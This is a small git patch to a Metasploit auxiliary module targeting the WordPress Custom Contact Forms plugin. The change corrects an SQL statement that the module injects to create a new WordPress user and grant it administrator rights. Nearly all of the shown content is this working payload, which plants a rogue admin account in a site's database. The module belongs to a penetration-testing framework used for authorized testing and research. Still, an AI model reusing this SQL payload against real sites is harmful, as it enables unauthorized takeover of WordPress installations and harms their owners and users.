From 9a424a81bcda3fc000478878509cd265a1c51e62 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <firefart@gmail.com>
Date: Sat, 27 Sep 2014 13:46:55 +0200
Subject: [PATCH] fixed bug

---
 modules/auxiliary/admin/http/wp_custom_contact_forms.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
index 90e05fe04c..9d9d96e74a 100644
--- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
+++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
     # create user
     sql = "INSERT INTO #{table_prefix}users (user_login, user_pass) VALUES ('#{username}','#{Rex::Text.md5(password)}');"
     # make user administrator
-    sql << "INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(1,'wp_user_level','10');"
+    sql << "INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),((select id from #{table_prefix}users where user_login='#{username}'),'wp_user_level','10');"
 
     sql
   end